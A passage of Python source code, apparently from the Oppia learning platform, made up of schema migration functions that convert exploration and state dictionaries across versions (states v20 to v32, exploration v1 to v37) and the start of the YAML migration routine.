answer_group['outcome']['feedback']['content_id'] = content_id
if state_dict['interaction']['default_outcome']:
default_outcome = state_dict['interaction']['default_outcome']
content_id = 'default_outcome'
content_ids_to_audio_translations[content_id] = (
default_outcome['feedback'].pop('audio_translations'))
default_outcome['feedback']['content_id'] = (content_id)
for index, hint in enumerate(state_dict['interaction']['hints']):
content_id = 'hint_' + python_utils.convert_to_bytes(index + 1)
content_ids_to_audio_translations[content_id] = (
hint['hint_content'].pop('audio_translations'))
hint['hint_content']['content_id'] = content_id
if state_dict['interaction']['solution']:
solution = state_dict['interaction']['solution']
content_id = 'solution'
content_ids_to_audio_translations[content_id] = (
solution['explanation'].pop('audio_translations'))
solution['explanation']['content_id'] = content_id
state_dict['content_ids_to_audio_translations'] = (
content_ids_to_audio_translations)
return states_dict
@classmethod
def _convert_states_v21_dict_to_v22_dict(cls, states_dict):
"""Converts from version 21 to 22. Version 22 converts all Rich Text
Editor content to be compatible with the textAngular format.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict, html_validation_service.convert_to_textangular)
return states_dict
@classmethod
def _convert_states_v22_dict_to_v23_dict(cls, states_dict):
"""Converts from version 22 to 23. Version 23 ensures that all
all oppia-noninteractive-image tags have caption attribute.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict, html_validation_service.add_caption_attr_to_image)
return states_dict
@classmethod
def _convert_states_v23_dict_to_v24_dict(cls, states_dict):
"""Converts from version 23 to 24. Version 24 converts all Rich Text
Editor content to be compatible with the CKEditor format.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict, html_validation_service.convert_to_ckeditor)
return states_dict
@classmethod
def _convert_states_v24_dict_to_v25_dict(cls, exp_id, states_dict):
"""Converts from version 24 to 25. Version 25 adds the dimensions of
images in the oppia-noninteractive-image tags.
Args:
exp_id: str. ID of the exploration.
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
add_dimensions_to_image_tags = functools.partial(
html_validation_service.add_dimensions_to_image_tags, # pylint: disable=line-too-long
exp_id)
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict,
add_dimensions_to_image_tags)
if state_dict['interaction']['id'] == 'ImageClickInput':
filename = state_dict['interaction']['customization_args'][
'imageAndRegions']['value']['imagePath']
state_dict['interaction']['customization_args'][
'imageAndRegions']['value']['imagePath'] = (
html_validation_service.get_filename_with_dimensions(
filename, exp_id))
return states_dict
@classmethod
def _convert_states_v25_dict_to_v26_dict(cls, states_dict):
"""Converts from version 25 to 26. Version 26 adds a new
customization arg to DragAndDropSortInput interaction which allows
multiple sort items in the same position.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['id'] == 'DragAndDropSortInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'allowMultipleItemsInSamePosition': {
'value': False
}
})
return states_dict
@classmethod
def _convert_states_v26_dict_to_v27_dict(cls, states_dict):
"""Converts from version 26 to 27. Version 27 adds written_translations
dict to the state, which will allow translators to add translation
script for the state contents.
NOTE: This migration will also filter out the content_id from
content_ids_to_audio_translations such that the state passes the new
validation check safely. The earlier state validation used to check that
the set of all content ids present within the state is subset of the
content_ids_to_audio_translations keys, but the new validation will
check whether both are equal.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_content_id_list = []
# Add state card's content id into the state_content_id_list.
state_content_id_list.append(state_dict['content']['content_id'])
# Add answer_groups content id into the state_content_id_list.
for answer_group in state_dict['interaction']['answer_groups']:
answer_feedback = answer_group['outcome']['feedback']
state_content_id_list.append(answer_feedback['content_id'])
# If present, add default_outcome content id into
# state_content_id_list.
default_outcome = state_dict['interaction']['default_outcome']
if default_outcome is not None:
state_content_id_list.append(
default_outcome['feedback']['content_id'])
# Add hints content id into state_content_id_list.
for hint in state_dict['interaction']['hints']:
state_content_id_list.append(hint['hint_content']['content_id'])
# If present, add solution content id into state_content_id_list.
solution = state_dict['interaction']['solution']
if solution:
state_content_id_list.append(
solution['explanation']['content_id'])
# Filter content_ids_to_audio_translations with unwanted content id.
# These are the extra content id present within the
# content_ids_to_audio_translations dict which is of no use as html
# linked to these content_ids are not available in the state.
citat = state_dict['content_ids_to_audio_translations']
extra_content_ids_in_citat = (
set(citat.keys()) - set(state_content_id_list))
for content_id in extra_content_ids_in_citat:
state_dict['content_ids_to_audio_translations'].pop(content_id)
# Create written_translations using the state_content_id_list.
translations_mapping = {}
for content_id in state_content_id_list:
translations_mapping[content_id] = {}
state_dict['written_translations'] = {}
state_dict['written_translations']['translations_mapping'] = (
translations_mapping)
return states_dict
@classmethod
def _convert_states_v27_dict_to_v28_dict(cls, states_dict):
"""Converts from version 27 to 28. Version 28 replaces
content_ids_to_audio_translations with recorded_voiceovers.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_dict['recorded_voiceovers'] = {
'voiceovers_mapping': (
state_dict.pop('content_ids_to_audio_translations'))
}
return states_dict
@classmethod
def _convert_states_v28_dict_to_v29_dict(cls, states_dict):
"""Converts from version 28 to 29. Version 29 adds
solicit_answer_details boolean variable to the state, which
allows the creator to ask for answer details from the learner
about why they landed on a particular answer.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_dict['solicit_answer_details'] = False
return states_dict
@classmethod
def _convert_states_v29_dict_to_v30_dict(cls, states_dict):
"""Converts from version 29 to 30. Version 30 replaces
tagged_misconception_id with tagged_skill_misconception_id, which
contains the skill id and misconception id of the tagged misconception,
connected by '-'.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['tagged_skill_misconception_id'] = None
del answer_group['tagged_misconception_id']
return states_dict
@classmethod
def _convert_states_v30_dict_to_v31_dict(cls, states_dict):
"""Converts from version 30 to 31. Version 31 updates the
Voiceover model to have an initialized duration_secs attribute
of 0.0. This will be updated when a new mp3 audio file is uploaded
for the exploration.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
# Get the voiceovers_mapping metadata.
voiceovers_mapping = (state_dict['recorded_voiceovers']
['voiceovers_mapping'])
language_codes_to_audio_metadata = voiceovers_mapping.values()
for language_codes in language_codes_to_audio_metadata:
for audio_metadata in language_codes.values():
# Initialize duration_secs with 0.0 for every voiceover
# recording under Content, Feedback, Hints, and Solutions.
# This is necessary to keep the state functional
# when migrating to v31.
audio_metadata['duration_secs'] = 0.0
return states_dict
@classmethod
def _convert_states_v31_dict_to_v32_dict(cls, states_dict):
"""Converts from version 31 to 32. Version 32 adds a new
customization arg to SetInput interaction which allows
creators to add custom text to the "Add" button.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['id'] == 'SetInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'buttonText': {
'value': 'Add item'
}
})
return states_dict
@classmethod
def update_states_from_model(
cls, versioned_exploration_states, current_states_schema_version,
exploration_id):
"""Converts the states blob contained in the given
versioned_exploration_states dict from current_states_schema_version to
current_states_schema_version + 1.
Note that the versioned_exploration_states being passed in is modified
in-place.
Args:
versioned_exploration_states: dict. A dict with two keys:
- states_schema_version: int. The states schema version for the
exploration.
- states: dict. The dict of states comprising the exploration.
The keys are state names and the values are dicts used to
initialize a State domain object.
current_states_schema_version: int. The current states
schema version.
exploration_id: str. ID of the exploration.
"""
versioned_exploration_states['states_schema_version'] = (
current_states_schema_version + 1)
conversion_fn = getattr(cls, '_convert_states_v%s_dict_to_v%s_dict' % (
current_states_schema_version, current_states_schema_version + 1))
if current_states_schema_version == 24:
conversion_fn = functools.partial(conversion_fn, exploration_id)
versioned_exploration_states['states'] = conversion_fn(
versioned_exploration_states['states'])
# The current version of the exploration YAML schema. If any backward-
# incompatible changes are made to the exploration schema in the YAML
# definitions, this version number must be changed and a migration process
# put in place.
CURRENT_EXP_SCHEMA_VERSION = 37
LAST_UNTITLED_SCHEMA_VERSION = 9
@classmethod
def _convert_v1_dict_to_v2_dict(cls, exploration_dict):
"""Converts a v1 exploration dict into a v2 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v1.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v2.
"""
exploration_dict['schema_version'] = 2
exploration_dict['init_state_name'] = (
exploration_dict['states'][0]['name'])
states_dict = {}
for state in exploration_dict['states']:
states_dict[state['name']] = state
del states_dict[state['name']]['name']
exploration_dict['states'] = states_dict
return exploration_dict
@classmethod
def _convert_v2_dict_to_v3_dict(cls, exploration_dict):
"""Converts a v2 exploration dict into a v3 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v2.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v3.
"""
exploration_dict['schema_version'] = 3
exploration_dict['objective'] = ''
exploration_dict['language_code'] = constants.DEFAULT_LANGUAGE_CODE
exploration_dict['skill_tags'] = []
exploration_dict['blurb'] = ''
exploration_dict['author_notes'] = ''
return exploration_dict
@classmethod
def _convert_v3_dict_to_v4_dict(cls, exploration_dict):
"""Converts a v3 exploration dict into a v4 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v3.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v4.
"""
exploration_dict['schema_version'] = 4
for _, state_defn in exploration_dict['states'].items():
state_defn['interaction'] = copy.deepcopy(state_defn['widget'])
state_defn['interaction']['id'] = copy.deepcopy(
state_defn['interaction']['widget_id'])
del state_defn['interaction']['widget_id']
del state_defn['interaction']['sticky']
del state_defn['widget']
return exploration_dict
@classmethod
def _convert_v4_dict_to_v5_dict(cls, exploration_dict):
"""Converts a v4 exploration dict into a v5 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v4.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v5.
"""
exploration_dict['schema_version'] = 5
# Rename the 'skill_tags' field to 'tags'.
exploration_dict['tags'] = exploration_dict['skill_tags']
del exploration_dict['skill_tags']
exploration_dict['skin_customizations'] = {
'panels_contents': {
'bottom': [],
'left': [],
'right': []
}
}
return exploration_dict
@classmethod
def _convert_v5_dict_to_v6_dict(cls, exploration_dict):
"""Converts a v5 exploration dict into a v6 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v5.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v6.
"""
exploration_dict['schema_version'] = 6
# Ensure this exploration is up-to-date with states schema v3.
exploration_dict['states'] = cls._convert_states_v0_dict_to_v1_dict(
exploration_dict['states'])
exploration_dict['states'] = cls._convert_states_v1_dict_to_v2_dict(
exploration_dict['states'])
exploration_dict['states'] = cls._convert_states_v2_dict_to_v3_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 3
return exploration_dict
@classmethod
def _convert_v6_dict_to_v7_dict(cls, exploration_dict):
"""Converts a v6 exploration dict into a v7 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v6.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v7.
"""
exploration_dict['schema_version'] = 7
# Ensure this exploration is up-to-date with states schema v4.
exploration_dict['states'] = cls._convert_states_v3_dict_to_v4_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 4
return exploration_dict
@classmethod
def _convert_v7_dict_to_v8_dict(cls, exploration_dict):
"""Converts a v7 exploration dict into a v8 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v7.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v8.
"""
exploration_dict['schema_version'] = 8
# Ensure this exploration is up-to-date with states schema v5.
exploration_dict['states'] = cls._convert_states_v4_dict_to_v5_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 5
return exploration_dict
@classmethod
def _convert_v8_dict_to_v9_dict(cls, exploration_dict):
"""Converts a v8 exploration dict into a v9 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v8.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v9.
"""
exploration_dict['schema_version'] = 9
# Ensure this exploration is up-to-date with states schema v6.
exploration_dict['states'] = cls._convert_states_v5_dict_to_v6_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 6
return exploration_dict
@classmethod
def _convert_v9_dict_to_v10_dict(cls, exploration_dict, title, category):
"""Converts a v9 exploration dict into a v10 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v9.
title: str. The exploration title.
category: str. The exploration category.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v10.
"""
exploration_dict['schema_version'] = 10
# From v10 onwards, the title and schema version are stored in the YAML
# file.
exploration_dict['title'] = title
exploration_dict['category'] = category
# Remove the 'default_skin' property.
del exploration_dict['default_skin']
# Upgrade all gadget panel customizations to have exactly one empty
# bottom panel. This is fine because, for previous schema versions,
# gadgets functionality had not been released yet.
exploration_dict['skin_customizations'] = {
'panels_contents': {
'bottom': [],
}
}
# Ensure this exploration is up-to-date with states schema v7.
exploration_dict['states'] = cls._convert_states_v6_dict_to_v7_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 7
return exploration_dict
@classmethod
def _convert_v10_dict_to_v11_dict(cls, exploration_dict):
"""Converts a v10 exploration dict into a v11 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v10.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v11.
"""
exploration_dict['schema_version'] = 11
exploration_dict['states'] = cls._convert_states_v7_dict_to_v8_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 8
return exploration_dict
@classmethod
def _convert_v11_dict_to_v12_dict(cls, exploration_dict):
"""Converts a v11 exploration dict into a v12 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v11.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v12.
"""
exploration_dict['schema_version'] = 12
exploration_dict['states'] = cls._convert_states_v8_dict_to_v9_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 9
return exploration_dict
@classmethod
def _convert_v12_dict_to_v13_dict(cls, exploration_dict):
"""Converts a v12 exploration dict into a v13 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v12.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v13.
"""
exploration_dict['schema_version'] = 13
exploration_dict['states'] = cls._convert_states_v9_dict_to_v10_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 10
return exploration_dict
@classmethod
def _convert_v13_dict_to_v14_dict(cls, exploration_dict):
"""Converts a v13 exploration dict into a v14 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v13.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v14.
"""
exploration_dict['schema_version'] = 14
exploration_dict['states'] = cls._convert_states_v10_dict_to_v11_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 11
return exploration_dict
@classmethod
def _convert_v14_dict_to_v15_dict(cls, exploration_dict):
"""Converts a v14 exploration dict into a v15 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v14.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v15.
"""
exploration_dict['schema_version'] = 15
exploration_dict['states'] = cls._convert_states_v11_dict_to_v12_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 12
return exploration_dict
@classmethod
def _convert_v15_dict_to_v16_dict(cls, exploration_dict):
"""Converts a v15 exploration dict into a v16 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v15.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v16.
"""
exploration_dict['schema_version'] = 16
exploration_dict['states'] = cls._convert_states_v12_dict_to_v13_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 13
return exploration_dict
@classmethod
def _convert_v16_dict_to_v17_dict(cls, exploration_dict):
"""Converts a v16 exploration dict into a v17 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v16.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v17.
Removes gadgets and skins.
"""
exploration_dict['schema_version'] = 17
if 'skin_customizations' in exploration_dict:
del exploration_dict['skin_customizations']
return exploration_dict
@classmethod
def _convert_v17_dict_to_v18_dict(cls, exploration_dict):
"""Converts a v17 exploration dict into a v18 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v17.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v18.
Adds auto_tts_enabled property.
"""
exploration_dict['schema_version'] = 18
if exploration_dict['category'] == 'Languages':
exploration_dict['auto_tts_enabled'] = False
else:
exploration_dict['auto_tts_enabled'] = True
return exploration_dict
@classmethod
def _convert_v18_dict_to_v19_dict(cls, exploration_dict):
"""Converts a v18 exploration dict into a v19 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v18.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v19.
Adds audio translations to feedback, hints, and solutions.
"""
exploration_dict['schema_version'] = 19
exploration_dict['states'] = cls._convert_states_v13_dict_to_v14_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 14
return exploration_dict
@classmethod
def _convert_v19_dict_to_v20_dict(cls, exploration_dict):
"""Converts a v19 exploration dict into a v20 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v19.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v20.
Introduces a correctness property at the top level, and changes each
answer group's "correct" field to "labelled_as_correct" instead.
"""
exploration_dict['schema_version'] = 20
exploration_dict['states'] = cls._convert_states_v14_dict_to_v15_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 15
exploration_dict['correctness_feedback_enabled'] = False
return exploration_dict
@classmethod
def _convert_v20_dict_to_v21_dict(cls, exploration_dict):
"""Converts a v20 exploration dict into a v21 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v20.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v21.
Adds a refresher_exploration_id field to each answer group outcome, and
to the default outcome (if it exists).
"""
exploration_dict['schema_version'] = 21
exploration_dict['states'] = cls._convert_states_v15_dict_to_v16_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 16
return exploration_dict
@classmethod
def _convert_v21_dict_to_v22_dict(cls, exploration_dict):
"""Converts a v21 exploration dict into a v22 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v21.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v22.
Moves the labelled_as_correct field from the answer group level to the
outcome level, and adds two extra customization args to the
FractionInput interaction.
"""
exploration_dict['schema_version'] = 22
exploration_dict['states'] = cls._convert_states_v16_dict_to_v17_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 17
return exploration_dict
@classmethod
def _convert_v22_dict_to_v23_dict(cls, exploration_dict):
"""Converts a v22 exploration dict into a v23 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v22.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v23.
Adds a new customization arg to FractionInput interactions
which allows you to add custom placeholders.
"""
exploration_dict['schema_version'] = 23
exploration_dict['states'] = cls._convert_states_v17_dict_to_v18_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 18
return exploration_dict
@classmethod
def _convert_v23_dict_to_v24_dict(cls, exploration_dict):
"""Converts a v23 exploration dict into a v24 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v23.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v24.
Adds training_data parameter to each answer group to store training
data of corresponding answer group.
"""
exploration_dict['schema_version'] = 24
exploration_dict['states'] = cls._convert_states_v18_dict_to_v19_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 19
return exploration_dict
@classmethod
def _convert_v24_dict_to_v25_dict(cls, exploration_dict):
"""Converts a v24 exploration dict into a v25 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v24.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v25.
Adds additional tagged_misconception_id and
missing_prerequisite_skill_id fields to answer groups and outcomes
respectively.
"""
exploration_dict['schema_version'] = 25
exploration_dict['states'] = cls._convert_states_v19_dict_to_v20_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 20
return exploration_dict
@classmethod
def _convert_v25_dict_to_v26_dict(cls, exploration_dict):
"""Converts a v25 exploration dict into a v26 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v25.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v26.
Move audio_translations into a seperate dict.
"""
exploration_dict['schema_version'] = 26
exploration_dict['states'] = cls._convert_states_v20_dict_to_v21_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 21
return exploration_dict
@classmethod
def _convert_v26_dict_to_v27_dict(cls, exploration_dict):
"""Converts a v26 exploration dict into a v27 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v26.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v27.
Converts all Rich Text Editor content to be compatible with the
textAngular format.
"""
exploration_dict['schema_version'] = 27
exploration_dict['states'] = cls._convert_states_v21_dict_to_v22_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 22
return exploration_dict
@classmethod
def _convert_v27_dict_to_v28_dict(cls, exploration_dict):
"""Converts a v27 exploration dict into a v28 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v27.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v28.
Adds caption attribute to all oppia-noninteractive-image tags.
"""
exploration_dict['schema_version'] = 28
exploration_dict['states'] = cls._convert_states_v22_dict_to_v23_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 23
return exploration_dict
@classmethod
def _convert_v28_dict_to_v29_dict(cls, exploration_dict):
"""Converts a v28 exploration dict into a v29 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v28.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v29.
Converts all Rich Text Editor content to be compatible with the
CKEditor format.
"""
exploration_dict['schema_version'] = 29
exploration_dict['states'] = cls._convert_states_v23_dict_to_v24_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 24
return exploration_dict
@classmethod
def _convert_v29_dict_to_v30_dict(cls, exp_id, exploration_dict):
"""Converts a v29 exploration dict into a v30 exploration dict.
Args:
exp_id: str. ID of the exploration.
exploration_dict: dict. The dict representation of an exploration
with schema version v29.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v30.
Adds dimensions to all oppia-noninteractive-image tags.
"""
exploration_dict['schema_version'] = 30
exploration_dict['states'] = cls._convert_states_v24_dict_to_v25_dict(
exp_id, exploration_dict['states'])
exploration_dict['states_schema_version'] = 25
return exploration_dict
@classmethod
def _convert_v30_dict_to_v31_dict(cls, exploration_dict):
"""Converts a v30 exploration dict into a v31 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v30.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v31.
Adds a new customization arg to DragAndDropSortInput interactions
which allows multiple sort items in the same position.
"""
exploration_dict['schema_version'] = 31
exploration_dict['states'] = cls._convert_states_v25_dict_to_v26_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 26
return exploration_dict
@classmethod
def _convert_v31_dict_to_v32_dict(cls, exploration_dict):
"""Converts a v31 exploration dict into a v32 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v31.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v32.
Adds content_tranlations in state for adding text translation.
"""
exploration_dict['schema_version'] = 32
exploration_dict['states'] = cls._convert_states_v26_dict_to_v27_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 27
return exploration_dict
@classmethod
def _convert_v32_dict_to_v33_dict(cls, exploration_dict):
"""Converts a v32 exploration dict into a v33 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v32.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v33.
Replaces content_ids_to_audio_translations with recorded_voiceovers in
each state of the exploration.
"""
exploration_dict['schema_version'] = 33
exploration_dict['states'] = cls._convert_states_v27_dict_to_v28_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 28
return exploration_dict
@classmethod
def _convert_v33_dict_to_v34_dict(cls, exploration_dict):
"""Converts a v33 exploration dict into a v34 exploration dict.
Adds solicit_answer_details in state to ask learners for the
answer details.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v33.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v34.
"""
exploration_dict['schema_version'] = 34
exploration_dict['states'] = cls._convert_states_v28_dict_to_v29_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 29
return exploration_dict
@classmethod
def _convert_v34_dict_to_v35_dict(cls, exploration_dict):
"""Converts a v34 exploration dict into a v35 exploration dict.
Replaces tagged_misconception_id with tagged_skill_misconception_id,
which contains the skill id and misconception id of the tagged
misconception, connected by '-'.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v34.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v35.
"""
exploration_dict['schema_version'] = 35
exploration_dict['states'] = cls._convert_states_v29_dict_to_v30_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 30
return exploration_dict
@classmethod
def _convert_v35_dict_to_v36_dict(cls, exploration_dict):
"""Converts a v35 exploration dict into a v36 exploration dict.
Updates existing explorations to match the Voiceover class to have
the duration attribute initalised to 0.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v35.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v36.
"""
exploration_dict['schema_version'] = 36
exploration_dict['states'] = cls._convert_states_v30_dict_to_v31_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 31
return exploration_dict
@classmethod
def _convert_v36_dict_to_v37_dict(cls, exploration_dict):
"""Converts a v36 exploration dict into a v37 exploration dict.
Adds a new customization arg to SetInput interactions
which allows creators to customize the "Add item" button.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v36.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v37.
"""
exploration_dict['schema_version'] = 37
exploration_dict['states'] = cls._convert_states_v31_dict_to_v32_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 32
return exploration_dict
@classmethod
def _migrate_to_latest_yaml_version(
cls, yaml_content, exp_id, title=None, category=None):
"""Return the YAML content of the exploration in the latest schema
format.
Args:
yaml_content: str. The YAML representation of the exploration.
exp_id: str. ID of the exploration.
title: str. The exploration title.
category: str. The exploration category.
Returns:
tuple(dict, int). The dict 'exploration_dict' is the representation
of the Exploration and the 'initial_schema_version' is the initial
schema version provided in 'yaml_content'.
Raises:
Exception: 'yaml_content' or the exploration schema version is not
valid.
"""
try:
exploration_dict = utils.dict_from_yaml(yaml_content)
except Exception as e:
raise Exception(
'Please ensure that you are uploading a YAML text file, not '
'a zip file. The YAML parser returned the following error: %s'
% e)
exploration_schema_version = exploration_dict.get('schema_version')
initial_schema_version = exploration_schema_version
if exploration_schema_version is None:
raise Exception('Invalid YAML file: no schema version specified.')
if not (1 <= exploration_schema_version
<= cls.CURRENT_EXP_SCHEMA_VERSION):
raise Exception(
'Sorry, we can only process v1 to v%s exploration YAML files '
'at present.' % cls.CURRENT_EXP_SCHEMA_VERSION)
if exploration_schema_version == 1:
exploration_dict = cls._convert_v1_dict_to_v2_dict(
exploration_dict)
exploration_schema_version = 2
if exploration_schema_version == 2:
exploration_dict = cls._convert_v2_dict_to_v3_dict(
exploration_dict)
exploration_schema_version = 3
if exploration_schema_version == 3:
exploration_dict = cls._convert_v3_dict_to_v4_dict(
exploration_dict)
exploration_schema_version = 4
if exploration_schema_version == 4:
exploration_dict = cls._convert_v4_dict_to_v5_dict(
exploration_dict)
exploration_schema_version = 5
if exploration_schema_version == 5:
exploration_dict = cls._convert_v5_dict_to_v6_dict(
exploration_dict)
exploration_schema_version = 6
if exploration_schema_version == 6:
exploration_dict = cls._convert_v6_dict_to_v7_dict(
exploration_dict)
exploration_schema_version = 7
if exploration_schema_version == 7:
exploration_dict = cls._convert_v7_dict_to_v8_dict(
exploration_dict)
exploration_schema_version = 8
if exploration_schema_version == 8:
exploration_dict = cls._convert_v8_dict_to_v9_dict(
exploration_dict)
exploration_schema_version = 9
if exploration_schema_version == 9:
